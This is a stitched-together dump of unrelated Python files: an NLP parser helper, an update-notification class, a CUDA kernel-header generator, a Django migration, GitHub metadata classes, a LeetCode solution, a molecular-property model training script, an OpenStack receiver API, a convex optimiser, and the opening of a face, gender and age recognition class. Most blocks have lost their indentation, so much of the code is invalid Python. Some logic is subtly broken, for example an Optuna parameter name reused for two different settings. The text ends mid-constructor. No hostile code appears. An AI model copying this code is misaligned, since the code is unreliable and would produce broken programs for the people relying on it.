#os.environ['CLASSPATH'] = ini_path
st = CoreNLPParser(url=os.environ['STANFORD_NLP_TOOLS'], tagtype='pos')
postagger_list = st.tag(criterion)
return postagger_list
'''
#Example
criterion = 'Current diagnosis of alcohol dependence'
print(get_postagger_for_criterion(criterion.split()))
#[('Current', 'JJ'), ('diagnosis', 'NN'), ('of', 'IN'), ('alcohol', 'NN'), ('dependence', 'NN')]
'''
def get_parser_tree_from_phrase(phrase):
#ini_path = "/stanford/jars"
#os.environ['STANFORD_PARSER'] = ini_path
#os.environ['STANFORD_MODELS'] = ini_path
'''
parser = stanford.StanfordParser(model_path= ini_path + "/stanford-parser-3.9.2-models/edu/stanford/nlp/models/lexparser/englishPCFG.ser.gz")
parse_generator = parser.raw_parse(phrase)
for line in parse_generator:
parse_tree = line
break
'''
parse_tree = Tree(None, [])
parser = CoreNLPParser(url=os.environ['STANFORD_NLP_TOOLS'])
try:
parse_generator = parser.raw_parse(phrase)
for line in parse_generator:
parse_tree = line
break
    except Exception:
        print('Something went wrong when trying to get a parse tree from the Stanford Parser!')
return parse_tree
if __name__ == '__main__':
excluded_list = ['CC','DT', 'EX', 'IN', 'MD', 'POS', 'RP', 'WDT', 'WP', 'WP$']
#phrase_tree = get_parser_tree_from_phrase('dental implants')
phrase_tree = get_parser_tree_from_phrase('type 1 diabetes or type 2 diabetes with medication known to induce hypoglycemia (f.e. sulfonylurea derivatives')
print(type(phrase_tree), phrase_tree)
for tree in phrase_tree.subtrees(lambda s: s.height() == 2 or s.height() == 4 and s.label() not in [ 'PP']):
print(' '.join(tree.leaves()))
print(tree.label())
|
from weakref import WeakSet
class UpdateModel(object):
"""Provide the object with a way to notify other objects
that depend on it.
"""
# Slots ensures we're explicit and fast
__slots__ = ('_sources', '_listeners', '_up_to_date',
'_metadata', '_notify_callback',
'__weakref__')
def __init__(self, metadata=None, notify_callback=None, *args, **kwargs):
"""Initialize the chain.
By tracking both sources and listeners, we can make a graph of what
gets updated by what.
The metadata is a bucket for runtime info to be checked during notifications.
"""
# Initialize mixins - NOPE Update is not cooperative.
# It expects to be a base class
#super(UpdateModel, self).__init__(*args, **kwargs)
self._sources = tuple()
self._listeners = WeakSet()
self._metadata = metadata
self._notify_callback = notify_callback
self._up_to_date = True
# Initialize mixins
super(UpdateModel, self).__init__(*args, **kwargs)
@property
def metadata(self):
return self._metadata
def subscribe(self, listener):
"""Add a listener to the subscriber list.
This isn't a set - order will likely help efficiency,
the list will be updated infrequently, and the list
should never get very big anyhow.
Note that Calc objects have a source to act as their publisher list.
(In case we want to backtrace.)
"""
        if listener not in self._listeners:
self._listeners.add(listener)
def unsubscribe(self, listener):
"""Remove a listener from the subscriber list.
"""
while listener in self._listeners:
self._listeners.remove(listener)
def notify(self, old_selector, new_selector, source=None, depth=0):
"""Fires an update to make sure dependents are updated, if needed.
The selectors show what happened in the update.
"""
for dependent in self._listeners:
try:
# TODO: verify that for each update, only one update is marshalled and fired
# for example, if an update forces a Composable to clear,
# then we can expect that it'll fire for both the clear _and_ the pass-thru update
if dependent.up_to_date or old_selector:
dependent.update(old_selector, new_selector, source or self, depth+1)
except NotImplementedError:
pass
except AttributeError:
pass
if self._notify_callback:
try:
self._notify_callback(old_selector, new_selector, source or self, depth)
            except Exception:
                pass  # isolate event failures
def update(self, old_selector, new_selector, source=None, depth=0):
"""Execute the update. Each class will have its own way to implement this."""
# (None, None) signals that the data is out of date,
# but there is nothing for dependents to do yet.
self._up_to_date = False
# Pass-through updates without triggering
self.notify(old_selector, new_selector, source or self, depth)
# NOTE: super calls in subclasses should mark up_to_date when they're brought up
@property
def listeners(self):
return self._listeners
@property
def up_to_date(self):
return self._up_to_date
@listeners.setter
def listeners(self, new_listeners):
self._replace_listeners(new_listeners)
def _replace_listeners(self, new_listeners):
"""If the listeners are changed en masse, break
all the subscriptions.
This setter makes sure the subscription methods are never skipped.
"""
        while self._listeners:
            listener = next(iter(self._listeners))
            self.unsubscribe(listener)
for listener in new_listeners:
self.subscribe(listener)
@property
def sources(self):
return self._sources
@sources.setter
def sources(self, new_sources):
self._replace_sources(new_sources)
def _replace_sources(self, new_sources):
for source in set(self._sources).difference(set(new_sources)):
source.unsubscribe(self)
for source in new_sources:
source.subscribe(self)
self._sources = new_sources
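# Minimal usage sketch (illustrative): wiring one model as the source of
# another and watching an update propagate.
if __name__ == '__main__':
    events = []
    parent = UpdateModel(
        notify_callback=lambda old, new, src, depth: events.append((old, new, depth)))
    child = UpdateModel()
    child.sources = (parent,)       # subscribes child to parent
    parent.update(None, 'changed')  # marks parent stale and notifies child
    print(events)                   # [(None, 'changed', 0)]
    print(child.up_to_date)         # False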
|
#
#
#
def tc_gen_code_Kernel_Head(f, kernel_name, l_t3_d_decl_var, l_t2_d_decl_var, l_v2_d_decl_var, l_input_strides, l_external_idx, l_internal_idx, l_inputs_addr,
opt_internal, opt_pre_computed, opt_data_type):
#
f.write("\n")
f.write("// created by tc_gen_code_Kernel()\n")
f.write("__global__ void ")
f.write(kernel_name)
f.write("(")
# parameters for t3 (output)
for t3_var in l_t3_d_decl_var:
if opt_pre_computed == -1:
if "range" in t3_var:
continue
if "base" in t3_var:
continue
if "offset" in t3_var:
continue
#
f.write(t3_var)
f.write(", ")
else:
f.write(t3_var)
f.write(", ")
f.write("\n")
# parameters for t2 (left)
for t2_var in l_t2_d_decl_var:
if opt_pre_computed == -1:
if "addr" in t2_var:
continue
if "offset" in t2_var:
continue
#
f.write(t2_var)
f.write(", ")
else:
f.write(t2_var)
f.write(", ")
f.write("\n")
# parameters for v2 (right)
for v2_var in l_v2_d_decl_var:
if opt_pre_computed == -1:
if "addr" in v2_var:
continue
if "offset" in v2_var:
continue
#
f.write(v2_var)
f.write(", ")
else:
f.write(v2_var)
f.write(", ")
f.write("\n")
#
    # [Rules] Sizes: External Indices and Internal Indices
    # numBlks: External Indices
#
if opt_pre_computed == -1:
#
# [Sizes] External
#
for each_idx in l_external_idx:
f.write("int size_" + each_idx + ", ")
#
# [Sizes] Internal
#
for each_idx in l_internal_idx:
f.write("int size_" + each_idx + ", ")
f.write("\n")
#
# [Blks] External
#
for each_idx in l_external_idx:
f.write("int numBlk_" + each_idx + ", ")
f.write("\n")
#
# (Optional) Strides for LEFT and RIGHT (if internal index is not FVI)
# This is for an internal index, because constant-memory will be used for
# multiple-internal index.
#
if len(l_input_strides) > 0:
for each_tc in l_input_strides:
f.write("int " + each_tc[0] + ", ")
f.write("int " + each_tc[2] + ", ")
f.write("\n")
#
# (Optional)
#
if opt_internal > 1:
for each_tensor_contraction in l_inputs_addr:
f.write("int* dev_internal_offset_" + each_tensor_contraction[0][3] + ", ")
f.write("int* dev_internal_offset_" + each_tensor_contraction[1][3] + ", ")
f.write("\n")
#
f.write("int stride_reg_x, ")
f.write("int stride_reg_y, ")
f.write("\n")
# the size of |internal indices| = size_internal
f.write("int size_internal")
f.write(")\n")
#
#
#
def tc_gen_code_Kernel_Head_RT(f, kernel_name, l_combined_t3_d_decl_var, l_combined_t2_d_decl_var, l_combined_v2_d_decl_var):
#
f.write("\n")
f.write("// created by tc_gen_code_kernel_RT()\n")
f.write("__global__ void ")
f.write(kernel_name)
f.write("(")
# T3 (Output)
#
idx_count = 0
for each_inner_group in l_combined_t3_d_decl_var:
for t3_var in each_inner_group:
if idx_count != 0:
idx_count = idx_count - 1 # Need to Get Rid of the Output (Overlapped)
continue
f.write(t3_var)
f.write(", ")
f.write("\n")
idx_count = idx_count + 1
# T2 (LEFT)
for each_inner_group in l_combined_t2_d_decl_var:
for t2_var in each_inner_group:
f.write(t2_var)
f.write(", ")
f.write("\n")
# V2 (RIGHT)
for each_inner_group in l_combined_v2_d_decl_var:
for v2_var in each_inner_group:
f.write(v2_var)
f.write(", ")
f.write("\n")
#
f.write("int stride_reg_x, ")
f.write("int stride_reg_y, ")
#
f.write("int size_internal")
f.write(")\n")
|
# Generated by Django 3.1.6 on 2021-05-12 21:29
from django.db import migrations
def unset_non_page_content_paths(apps, schema_editor):
"""
Blanks 'dirpath' and 'filename' values for all WebsiteContent records that do not represent page content.
The destination filepath for these types of WebsiteContent records comes from the site config, so having non-blank
values for these fields is misleading.
"""
WebsiteContent = apps.get_model("websites", "WebsiteContent")
WebsiteContent.objects.filter(is_page_content=False).update(dirpath="", filename="")
class Migration(migrations.Migration):
dependencies = [
("websites", "0025_update_sync_checksum"),
]
operations = [
migrations.RemoveField(
model_name="websitecontent",
name="content_filepath",
),
migrations.RunPython(unset_non_page_content_paths, migrations.RunPython.noop),
]
|
import os
from waterbutler.core import metadata
class BaseGitHubMetadata(metadata.BaseMetadata):
def __init__(self, raw, folder=None, commit=None):
super().__init__(raw)
self.folder = folder
self.commit = commit
@property
def provider(self):
return 'github'
@property
def extra(self):
ret = {}
if self.commit is not None:
ret['commit'] = self.commit
return ret
def build_path(self, path):
if self.folder:
path = os.path.join(self.folder, path.lstrip('/'))
return super().build_path(path)
class BaseGitHubFileMetadata(BaseGitHubMetadata, metadata.BaseFileMetadata):
def __init__(self, raw, folder=None, commit=None, web_view=None):
super().__init__(raw, folder, commit)
self.web_view = web_view
@property
def path(self):
return self.build_path(self.raw['path'])
@property
def modified(self):
if not self.commit:
return None
return self.commit['author']['date']
@property
def content_type(self):
return None
@property
def etag(self):
return '{}::{}'.format(self.path, self.raw['sha'])
@property
def extra(self):
return dict(super().extra, **{
'fileSha': self.raw['sha'],
'webView': self.web_view
})
class BaseGitHubFolderMetadata(BaseGitHubMetadata, metadata.BaseFolderMetadata):
@property
def path(self):
return self.build_path(self.raw['path'])
class GitHubFileContentMetadata(BaseGitHubFileMetadata):
@property
def name(self):
return self.raw['name']
@property
def size(self):
return self.raw['size']
class GitHubFolderContentMetadata(BaseGitHubFolderMetadata):
@property
def name(self):
return self.raw['name']
class GitHubFileTreeMetadata(BaseGitHubFileMetadata):
@property
def name(self):
return os.path.basename(self.raw['path'])
@property
def size(self):
return self.raw['size']
class GitHubFolderTreeMetadata(BaseGitHubFolderMetadata):
@property
def name(self):
return os.path.basename(self.raw['path'])
# TODO dates!
class GitHubRevision(metadata.BaseFileRevisionMetadata):
@property
def version_identifier(self):
return 'ref'
@property
def modified(self):
return self.raw['commit']['author']['date']
@property
def version(self):
return self.raw['sha']
@property
def extra(self):
return {
'user': {
'name': self.raw['commit']['committer']['name']
}
}
|
#
# @lc app=leetcode id=212 lang=python3
#
# [212] Word Search II
#
# https://leetcode.com/problems/word-search-ii/description/
#
# algorithms
# Hard (37.77%)
# Likes: 3927
# Dislikes: 147
# Total Accepted: 314.4K
# Total Submissions: 831.8K
# Testcase Example: '[["o","a","a","n"],["e","t","a","e"],["i","h","k","r"],["i","f","l","v"]]\n' +
# '["oath","pea","eat","rain"]'
#
# Given an m x n board of characters and a list of strings words, return all
# words on the board.
#
# Each word must be constructed from letters of sequentially adjacent cells,
# where adjacent cells are horizontally or vertically neighboring. The same
# letter cell may not be used more than once in a word.
#
#
# Example 1:
#
#
# Input: board =
# [["o","a","a","n"],["e","t","a","e"],["i","h","k","r"],["i","f","l","v"]],
# words = ["oath","pea","eat","rain"]
# Output: ["eat","oath"]
#
#
# Example 2:
#
#
# Input: board = [["a","b"],["c","d"]], words = ["abcb"]
# Output: []
#
#
#
# Constraints:
#
#
# m == board.length
# n == board[i].length
# 1 <= m, n <= 12
# board[i][j] is a lowercase English letter.
# 1 <= words.length <= 3 * 10^4
# 1 <= words[i].length <= 10
# words[i] consists of lowercase English letters.
# All the strings of words are unique.
#
#
#
from typing import List
# @lc code=start
"""
Time: 8.6s (18%)
Memory: 14.6 MB (40%)
"""
class Solution:
def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:
height = len(board)
if height == 0:
return []
width = len(board[0])
# construct char to pos
char2pos = {}
for i in range(height):
for j in range(width):
char = board[i][j]
if char in char2pos:
char2pos[char].append((i,j))
else:
char2pos[char] = [(i,j)]
res = []
marked = {}
for word in words:
            for pos in char2pos.get(word[0], [None]):
                if pos is not None:
marked[pos[0],pos[1]] = True
flag = self.findWord(board, marked,char2pos,pos[0],pos[1],word[1: ])
marked[pos[0],pos[1]] = False
if flag:
res.append(word)
break
return res
def findWord(self, board,marked,char2pos, x,y,word):
if len(word) == 0:
return True
height = len(board)
width = len(board[0])
candidate1 = [
(x-1,y), # up
(x,y-1), # left
(x,y+1), # right
(x+1,y) # down
]
candidate2 = char2pos.get(word[0], None)
marked[x,y] = True
        if candidate2 is None:
return False
c1 = set(candidate1)
c2 = set(candidate2)
c = c1.intersection(c2)
for i,j in c:
if marked.get((i,j), False):
continue
# val = board[i][j]
# if val == word[0]:
flag = self.findWord(board,marked,char2pos, i,j,word[1: ])
if flag:
marked[x,y] = False
return True
marked[x,y] = False
return False
# @lc code=end
if __name__ == "__main__":
board = [["o","a","b","n"],["o","t","a","e"],["a","h","k","r"],["a","f","l","v"]]
words = ["oa","oaa",'oao']
# board = [["a","a"]]
# words = ["aaa"]
# board = [["a","b"]]
# words = ["ab"]
so = Solution()
r = so.findWords(board, words)
print(r)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
\ /
\ o ^ o /
\ ( ) /
____________(%%%%%%%)____________
( / / )%%%%%%%( \ \ )
(___/___/__/ \__\___\___)
( / /(%%%%%%%)\ \ )
(__/___/ (%%%%%%%) \___\__)
/( )\
/ (%%%%%) \
(%%%)
!
"""
from dmpnn.models import GraphNetworkLigthning, GraphNetworkEnsembleLightning, ExplainerNetworkLightning
from dmpnn.data import GraphsDataModule
from dmpnn.splits import ScaffoldSplitter
import torch
import numpy
import os
import shutil
import optuna
import argparse
import pandas
import warnings
import logging
import sys
import time
import pytorch_lightning
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.callbacks import EarlyStopping
from typing import Union, Tuple, Optional
__author__ = "Damien Coupry"
__copyright__ = "GSK"
__license__ = "MIT"
__version__ = "0.1.0"
__maintainer__ = "Damien Coupry"
__email__ = "damien.x.coupry@gsk.com"
__status__ = "Dev"
# setting up loggers and seeds
logging.getLogger("lightning").setLevel(logging.ERROR)
logger = logging.getLogger("optuna")
seed_everything(42)
def train_single_model(args: argparse.Namespace,
data: pytorch_lightning.LightningDataModule,
model_dir: str,
pruner: Optional[pytorch_lightning.callbacks.EarlyStopping] = None,
                       ) -> Tuple[pytorch_lightning.LightningModule, pytorch_lightning.Trainer]:
steps_per_epoch = int(data.get_train_len() / args.batch_size)
epochs_per_cycle = int(args.lr_cycle_size / steps_per_epoch)
early_stopping = EarlyStopping(monitor="val_loss", min_delta=1e-3, patience=epochs_per_cycle + 1)
callbacks = [early_stopping, ]
if pruner is not None:
callbacks += [pruner, ]
model = GraphNetworkLigthning(hparams=args)
trainer = Trainer.from_argparse_args(args,
auto_select_gpus=True,
max_epochs=args.max_epochs,
min_epochs=(epochs_per_cycle + 1) * 3,
gpus=4,
num_nodes=1,
logger=False,
checkpoint_callback=True,
callbacks=callbacks,
progress_bar_refresh_rate=1 if args.jobs==1 else 0,
precision=16,
amp_backend="native",
amp_level="O2",
default_root_dir=model_dir,
weights_summary="full",
accelerator="dp",
)
trainer.fit(model, data)
    model.freeze()
    return model, trainer
def train(args: argparse.Namespace) -> Tuple[pytorch_lightning.LightningModule, float]:
"""
[summary]
Parameters
----------
args : argparse.Namespace
[description]
Returns
-------
float
[description]
"""
model_dir = f"{args.study_name}/{args.model_name}"
if not os.path.exists(model_dir):
os.mkdir(model_dir)
models = []
for cv in range(args.cv):
reps = []
for rep in range(3):
data = GraphsDataModule(hparams=args, cv=cv)
steps_per_epoch = int(data.get_train_len() / args.batch_size)
epochs_per_cycle = int(args.lr_cycle_size / steps_per_epoch)
early_stopping = EarlyStopping(monitor="val_loss", min_delta=1e-3, patience=epochs_per_cycle + 1)
model = GraphNetworkLigthning(hparams=args)
trainer = Trainer.from_argparse_args(args,
auto_select_gpus=True,
max_epochs=args.max_epochs,
# min_steps=args.lr_cycle_size*3,
min_epochs=(epochs_per_cycle + 1) * 3,
gpus=4,
num_nodes=1,
logger=False,
checkpoint_callback=True,
callbacks=[early_stopping, ],
# gradient_clip_val=0.5,
# val_check_interval= min(1.0, 500.0 * args.batch_size / len(data)),
progress_bar_refresh_rate=1 if args.jobs==1 else 0,
precision=16,
amp_backend="native",
amp_level="O2",
default_root_dir=model_dir,
weights_summary=None,
accelerator="dp",
)
trainer.fit(model, data)
trained_model = model._net.eval()
cv_score = early_stopping.best_score.cpu().detach()
reps.append((trained_model, cv_score))
# keep top 1 of 3 initializations
best_rep = sorted(reps, key=lambda k: k[1])[0]
models.append(best_rep[0])
ensemble = GraphNetworkEnsembleLightning(models, model._loss, args.target_col)
ensemble.freeze()
torch.save(ensemble._net.cpu().eval(), f"{model_dir}/{args.model_name}.ensemble.ckpt")
data.setup(stage="test")
test_score = trainer.test(model=ensemble, test_dataloaders=data.test_dataloader(), verbose=False)
test_score = test_score[0]['test_loss']
return ensemble, test_score
def objective(trial: optuna.Trial, prog_args: argparse.Namespace) -> float:
"""
[summary]
Parameters
----------
trial : optuna.Trial
[description]
prog_args : argparse.Namespace
[description]
Returns
-------
float
[description]
"""
prog_args = vars(prog_args)
hparams = {
'model_name': f"trial-{trial.number}",
'model_index': trial.number,
'learning_rate': trial.suggest_loguniform("learning_rate", 5e-5, 5e-3),
'lr_cycle_size' : trial.suggest_int("graph_depth", 100, 1000),
'batch_size': trial.suggest_int('batch_size', 32 ,256, log=True),
'beta1': trial.suggest_loguniform("beta1", 0.5, 0.999),
'beta2': trial.suggest_loguniform("beta2", 0.9, 0.999),
'gamma': trial.suggest_uniform("gamma", 0.8, 0.9),
'dropout': trial.suggest_uniform("dropout", 0.1, 0.5),
'weight_decay': trial.suggest_loguniform("weight_decay", 0.001, 0.1),
'hidden_size': trial.suggest_int('hidden_size', 8 , 32, log=True),
'graph_depth': trial.suggest_int("graph_depth", 1, 3),
'fc_depth': trial.suggest_int("fc_depth", 1, 3),
'output_size': len(prog_args["target_col"]),
}
hparams.update(prog_args)
args=argparse.Namespace(**hparams)
    # training a model with these params
model_dir = f"{args.study_name}/hyperopt/{args.model_name}"
if not os.path.exists(model_dir):
os.mkdir(model_dir)
# use the biggest cross validation training set
data = GraphsDataModule(hparams=args, cv=args.cv-1)
pruner = optuna.integration.PyTorchLightningPruningCallback(trial, monitor="val_loss")
    model, trainer = train_single_model(args, data, model_dir, pruner=pruner)
data.setup(stage="test")
test_score = trainer.test(model=model, test_dataloaders=data.test_dataloader(), verbose=False)
test_score = test_score[0]['test_loss']
return test_score
def setup_study(args: argparse.Namespace) -> optuna.study.Study:
"""
[summary]
Parameters
----------
args : argparse.Namespace
[description]
Returns
-------
optuna.study.Study
[description]
"""
# generate the study folder
logger.info(f"Setting up study directory: {args.study_name}")
if not os.path.exists(args.study_name):
os.mkdir(args.study_name)
if not os.path.exists(f"{args.study_name}/hyperopt"):
os.mkdir(f"{args.study_name}/hyperopt")
sys.stderr = open(f'{args.study_name}/errors.log', 'w')
# save the splits for cross validation
logger.info("Reading data...")
if not os.path.isfile(f"{args.study_name}/study.db"):
data = pandas.read_csv(args.data_file)#.sample(frac=args.overfit)
data_fileroot = os.path.basename(args.data_file)
logger.info("Scaffold-aware CV splitting:")
splitter = ScaffoldSplitter(data[args.smiles_col], k=args.cv)
train_splits, test_split = splitter.get_splits()
logger.info(f"\t-Test: {len(test_split):6} structures.")
data.iloc[test_split].to_csv(f"{args.study_name}/{data_fileroot}.test")
for i, split in enumerate(train_splits):
train_split = split["train"]
valid_split = split["valid"]
logger.info(f"\t-Training #{i}: {len(train_split):6} structures.")
logger.info(f"\t-Validation #{i}: {len(valid_split):6} structures.")
data.iloc[train_split].to_csv(f"{args.study_name}/{data_fileroot}.train.{i}")
data.iloc[valid_split].to_csv(f"{args.study_name}/{data_fileroot}.valid.{i}")
GraphsDataModule(hparams=args, cv=i).prepare_data()
else:
logger.info("Using pre-generated datasets and splits...")
study_sampler = optuna.samplers.CmaEsSampler(restart_strategy = 'ipop',
warn_independent_sampling=False)
study_pruner = optuna.pruners.HyperbandPruner(min_resource=1, max_resource='auto', reduction_factor=3)
study = optuna.create_study(study_name=args.study_name,
storage=f'sqlite:///{args.study_name}/study.db',
load_if_exists=True,
direction="minimize",
sampler=study_sampler,
pruner=study_pruner)
return study
# def train_graph_explainer(args):
# for i, property_name in enumerate(args.target_col):
# model = ExplainerNetworkLightning(task=args.task, property_index=i)
# data = GraphsDataModule(hparams=args, cv=0)
# early_stopping = EarlyStopping(monitor="val_loss", patience=5)
# trainer = Trainer(gpus=1,
# logger=False,
# checkpoint_callback=False,
# callbacks=[early_stopping,],
# progress_bar_refresh_rate=1,
# weights_summary=None)
# trainer.fit(model, data)
# trained_model = model._net.eval()
# trained_model_file = f"{args.study_name}/graph_{property_name}_explainer.ckpt"
# torch.save(trained_model.cpu(), trained_model_file)
# return
def main() -> None:
"""
[summary]
"""
logger.info("***************")
logger.info("** GSK-DMPNN **")
logger.info("***************")
parser = argparse.ArgumentParser(prog="GSK-DMPNN",
description='Automatically trains an optimal DMPNN ensemble model for QSAR purposes.',
epilog="*** End of optimization ***")
parser.add_argument("--num_trials", default=10, type=int, help="""Number of hyperparameter optimization rounds to execute.
Each trial trains a number of models equal to the square
of the cross validation parameter.""")
parser.add_argument("--study_name", default="study", type=str, help="The name of the optimization study. A directory will be created")
parser.add_argument("--cv", default=3, type=int, help="The number of scaffold aware cross-validation folds and repeats.")
parser.add_argument('--task', choices=["regression", "classification"], type=str, help="What task to train the model on.")
parser.add_argument('--max_epochs', default=100, type=int, help="Maximum epochs.")
parser.add_argument("--jobs", type=int, default=1, help="The number of available gpus")
parser.add_argument("--lr_cycle_size", default=2000, type=int, help="LR is cycled every N iterations.")
parser.add_argument("--extra", default=None, nargs="+", type=str, help="Extra feaures generators.")
    # give the data module a chance to add its own params
parser = GraphsDataModule.add_data_specific_args(parser)
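    # Example invocation (the script name, file path, and data-module flags
    # below are illustrative, not taken from this file):
    #   python optimize.py --study_name my_study --cv 3 --task regression \
    #       --num_trials 50 --jobs 2 --data_file data.csv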
args = parser.parse_args()
study = setup_study(args)
    study.optimize(lambda trial: objective(trial, args),
n_trials=args.num_trials,
timeout=48*60*60,
n_jobs=args.jobs,
catch=(RuntimeError, ))
fig = optuna.visualization.plot_param_importances(study)
fig.write_image(f'{args.study_name}/importances.svg')
fig = optuna.visualization.plot_optimization_history(study)
fig.write_image(f'{args.study_name}/history.svg')
trial = study.best_trial
logger.info(f"Number of finished trials: {len(study.trials)}")
logger.info(f"Best trial: {trial.number}")
logger.info(f"\tValue: {trial.value}")
logger.info("\tParams: ")
for key, value in trial.params.items():
logger.info(f"\t\t{key}: {value}")
print(study.trials_dataframe())
# best_model_file = f"{args.study_name}/trial-{trial.number}/trial-{trial.number}.ensemble.ckpt"
# shutil.copyfile(best_model_file, f"{args.study_name}/best_model.ckpt")
# study.trials_dataframe().to_csv(f"{args.study_name}/study_results.csv")
# train_graph_explainer(args)
return None
if __name__ == '__main__':
# run the code
main()
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Receiver endpoint for Senlin v1 REST API.
"""
from webob import exc
from senlin.api.common import util
from senlin.api.common import wsgi
from senlin.common import consts
from senlin.common.i18n import _
class ReceiverController(wsgi.Controller):
"""WSGI controller for receiver resource in Senlin v1 API."""
REQUEST_SCOPE = 'receivers'
@util.policy_enforce
def index(self, req):
whitelist = {
consts.RECEIVER_NAME: 'mixed',
consts.RECEIVER_TYPE: 'mixed',
consts.RECEIVER_CLUSTER_ID: 'mixed',
consts.RECEIVER_USER_ID: 'mixed',
consts.RECEIVER_ACTION: 'mixed',
consts.PARAM_LIMIT: 'single',
consts.PARAM_MARKER: 'single',
consts.PARAM_SORT: 'single',
consts.PARAM_GLOBAL_PROJECT: 'single',
}
for key in req.params.keys():
if key not in whitelist.keys():
raise exc.HTTPBadRequest(_('Invalid parameter %s') % key)
params = util.get_allowed_params(req.params, whitelist)
project_safe = not util.parse_bool_param(
consts.PARAM_GLOBAL_PROJECT,
params.pop(consts.PARAM_GLOBAL_PROJECT, False))
params['project_safe'] = project_safe
obj = util.parse_request('ReceiverListRequest', req, params)
receivers = self.rpc_client.call(req.context, 'receiver_list', obj)
return {'receivers': receivers}
@util.policy_enforce
def create(self, req, body):
obj = util.parse_request(
'ReceiverCreateRequest', req, body, 'receiver')
result = self.rpc_client.call(req.context, 'receiver_create',
obj.receiver)
return {'receiver': result}
@util.policy_enforce
def get(self, req, receiver_id):
obj = util.parse_request(
'ReceiverGetRequest', req, {'identity': receiver_id})
receiver = self.rpc_client.call(req.context, 'receiver_get', obj)
return {'receiver': receiver}
@util.policy_enforce
def update(self, req, receiver_id, body):
receiver_data = body.get('receiver', None)
if receiver_data is None:
raise exc.HTTPBadRequest(_("Malformed request data, missing "
"'receiver' key in request body."))
kwargs = receiver_data
kwargs['identity'] = receiver_id
obj = util.parse_request('ReceiverUpdateRequest', req,
kwargs)
receiver = self.rpc_client.call(req.context, 'receiver_update', obj)
return {'receiver': receiver}
@util.policy_enforce
def delete(self, req, receiver_id):
obj = util.parse_request(
'ReceiverDeleteRequest', req, {'identity': receiver_id})
self.rpc_client.call(req.context, 'receiver_delete', obj)
raise exc.HTTPNoContent()
@util.policy_enforce
def notify(self, req, receiver_id, body=None):
obj = util.parse_request(
'ReceiverNotifyRequest', req, {'identity': receiver_id})
self.rpc_client.call(req.context, 'receiver_notify', obj)
raise exc.HTTPNoContent()
|
import numpy as np
import scipy as sp
import scipy.optimize
def analytic_center(A,b,eps,x0,method='nelder-mead'):
'''
Input:
- A -- N x M
- b -- N
- eps -- N
- x0 -- M
Output is a scipy OptimizeResult for
max np.sum(eps*log(b-A@x))
optimized using x0 as a starting point
'''
def func(x):
if ((b-A@x)<=0).any():
return np.inf
return -np.sum(eps*np.log(b-A@x))
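    # Gradient of func: d/dx[-sum(eps*log(b-A@x))] = A.T @ (eps/(b-A@x)),
    # which is what jac returns below.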
def jac(x):
return A.T@(eps/(b-A@x))
if method=='nelder-mead':
return sp.optimize.minimize(func,x0,method=method)
else:
return sp.optimize.minimize(func,x0,jac=jac,method=method)
def construct_reasonable_rectangle_problem(affines,epsilon=.1,maxsize=300):
affines=np.require(affines).astype(float)
n=affines.shape[0]
assert affines.shape==(n,n)
maxsize=np.require(maxsize).astype(float)
if maxsize.shape==():
maxsize=np.ones(n)*maxsize
hopefully_feasible=np.ones(n)*5
affines=np.sign(np.sum(affines,axis=1,keepdims=True)) * affines
A=np.concatenate([
-np.eye(n), # -x <=0
affines, # A@x < 1
np.eye(n), # x < maxsize
],axis=0)
b=np.concatenate([
np.zeros(n),
np.ones(n),
maxsize
],axis=0)
if not (A@hopefully_feasible<b).all():
raise ValueError("affine transformation is too big, try another method")
eps=np.r_[np.ones(n),np.ones(2*n)*epsilon]
return A,b,eps,hopefully_feasible
def calc_reasonable_rectangles(affines,epsilon=.01,maxsize=300):
    '''
    Input
    - affines -- N x N
    - epsilon -- scalar
    - maxsize -- scalar or N
    Output
    - rectangle -- N, integer
    Finds a reasonably large value of rectangle so that
    (np.abs(affines@rectangle)<1).all()
    (rectangle<maxsize).all()
    We do this in two steps. First, we flip signs so that all the
    affines point in the same direction:
    affines=np.sign(np.sum(affines,axis=1,keepdims=True)) * affines
    and then we solve the optimization problem
    max_rectangle
    np.sum(np.log(rectangle))
    + epsilon*np.sum(np.log(maxsize-rectangle))
    + epsilon*np.sum(np.log(1-affines@rectangle))
    '''
A,b,eps,hopefully_feasible = construct_reasonable_rectangle_problem(
affines,epsilon,maxsize
)
rez=analytic_center(A,b,eps,hopefully_feasible,method='nelder-mead')
return np.floor(rez['x']).astype(int)
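# A minimal usage sketch (not part of the original module); the 3x3 affine
# matrix below is invented purely for illustration.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    demo_affines = rng.normal(size=(3, 3)) * 0.01
    rectangle = calc_reasonable_rectangles(demo_affines, epsilon=.01, maxsize=300)
    print("rectangle:", rectangle)
    assert (rectangle < 300).all()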
|
# import the necessary packages
from imutils.video import VideoStream
from imutils.video import FPS
import numpy as np
import argparse
import pickle
import imutils
import time
import math
import cv2
import os
class RecognizeFaceGenderAge(object):
def __init__(self):
# construct the argument parser and parse the arguments
self.ap = argparse.ArgumentParser()
self.ap.add_argument("-d", "--detector", required=True,
help="path to OpenCV's deep learning face detector")
self.ap.add_argument("-m", "--embedding-model", required=True,
help="path to OpenCV's deep learning face embedding model")
self.ap.add_argument("-r", "--recognizer", required=True,
help="path to model trained to recognize faces")
self.ap.add_argument("-l", "--le", required=True,
help="path to label encoder")
self.ap.add_argument("-c", "--confidence", type=float, default=0.5,
help="minimum probability to filter weak detections")
self.ap.add_argument('--input', help='Path to input image or video file.')
self.ap.add_argument("--device", default="cpu", help="Device to inference on")
self.args = vars(self.ap.parse_args())
self.faceProto = "opencv_face_detector.pbtxt"
self.faceModel = "opencv_face_detector_uint8.pb"
self.ageProto = "age_deploy.prototxt"
self.ageModel = "age_net.caffemodel"
self.genderProto = "gender_deploy.prototxt"
self.genderModel = "gender_net.caffemodel"
self.MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
self.ageList = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']
self.genderList = ['Male', 'Female']
# load our serialized face detector from disk
print("[INFO] loading face detector...")
